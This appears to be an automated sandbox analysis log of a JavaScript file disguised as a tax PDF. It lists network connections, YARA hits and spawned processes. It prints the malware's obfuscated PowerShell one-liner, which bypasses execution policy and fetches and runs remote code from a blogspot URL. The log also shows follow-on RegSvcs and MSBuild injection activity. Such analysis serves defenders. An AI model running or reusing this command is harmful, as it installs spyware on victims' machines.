            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.186.31:443 -> 192.168.2.16:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.17.158:443 -> 192.168.2.16:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.132:443 -> 192.168.2.16:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.17.158:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.193.229:443 -> 192.168.2.16:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.193.229:443 -> 192.168.2.16:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.16:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.16:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 192.168.2.16:49807 -> 185.208.159.170:443 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49812 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.2.16:49813 version: TLS 1.2
            Source: Yara matchFile source: 00000023.00000003.1909090496.0000000004CF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.1903171311.0000000004AD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf.jsFile download: blob:https://securefilepro.netlify.app/f891a372-5ba2-4c2d-90be-57fcf2d0e4db
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6252_1491670841
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6252_1491670841
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.win@91/58@92/214
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\fd870463-4b90-4d4c-95db-b7afc2afd181.tmp
            Source: C:\Windows\System32\svchost.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
            Source: C:\Windows\SysWOW64\dllhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-7afd42d6-8c92-f86992-2a41c6d1ecb2}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4umvs3r.fjx.ps1
            Source: C:\Windows\System32\svchost.exeSystem information queried: HandleInformation
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,15029846499362184093,17269988125576325568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,15029846499362184093,17269988125576325568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 940
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 816
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\System32\dllhost.exe"
            Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\System32\dllhost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 940
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 680
            Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Temp\user-PC-20250307-1017.log
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr357C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/c6c2e3f9"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2316,i,14866277002353003105,15716734756151876631,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:3
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr5152.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/d8d6519b"
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=1996,i,2173057654512074534,17827567997929056838,262144 /prefetch:3
            Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr357C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/c6c2e3f9"
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr5152.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/d8d6519b"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2316,i,14866277002353003105,15716734756151876631,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=1996,i,2173057654512074534,17827567997929056838,262144 /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
